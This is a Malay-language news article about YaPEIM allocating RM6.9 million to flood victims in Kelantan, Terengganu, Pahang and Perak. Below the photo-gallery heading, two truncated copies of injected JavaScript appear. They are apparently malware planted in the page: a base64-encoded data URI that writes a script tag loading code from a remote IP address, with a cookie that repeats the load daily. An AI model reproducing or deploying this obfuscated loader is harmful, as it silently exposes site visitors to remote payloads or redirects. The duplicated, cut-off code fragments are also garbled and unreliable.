YaPEIM » YaPEIM peruntuk RM6.9 juta bantu mangsa banjir di empat negeri

Terkini

YaPEIM peruntuk RM6.9 juta bantu mangsa banjir di empat negeri

YaPEIM memperuntukkan sebanyak RM6.9 juta bagi membantu mangsa banjir di empat negeri yang terjejas teruk akibat bencana itu.

KOTA BHARU: Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) memperuntukkan sebanyak RM6.9 juta bagi membantu mangsa banjir di empat negeri yang terjejas teruk akibat bencana itu bulan lalu.

Presidennya, Dato’ Dr Hj. Abd. Malek Awang Kechil, berkata sumbangan itu bagi meringankan beban kerugian yang ditanggung mangsa di Kelantan, Terengganu, Pahang dan Perak.

Sehingga kini, pihaknya melakukan tiga program pasca banjir iaitu penyediaan keperluan asas harian, penyediaan air bersih dan pembersihan serta membaik pulih kediaman mangsa, katanya kepada pemberita selepas melancarkan program Perkasa Komuniti Pasca Banjir YaPEIM di Kampung Padang Layang, Pendek di sini, hari ini.

Abdul Malek berkata, YaPEIM mempunyai sebanyak 4,000 sukarelawan untuk membantu mangsa banjir di empat negeri terbabit.

“Kami akan bantu mengikut kemampuan, selain meringankan beban diharap bantuan ini memberi semangat kepada mereka untuk membina kehidupan baharu,” katanya.

Beliau berkata, pihaknya akan berusaha membantu mangsa yang rumah mereka rosak teruk sebelum mereka mendapat kediaman kekal.

Katanya, fasa pasca banjir adalah situasi paling mencabar bukan hanya kepada mangsa tetapi orang ramai menghulukan bantuan.

Sementara itu, Abdul Malek berkata YaPEIM memperuntukkan RM100,000 untuk membantu 150 keluarga mangsa banjir di jajahan Kota Bharu, Tumpat dan Tanah Merah. -BERNAMA

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top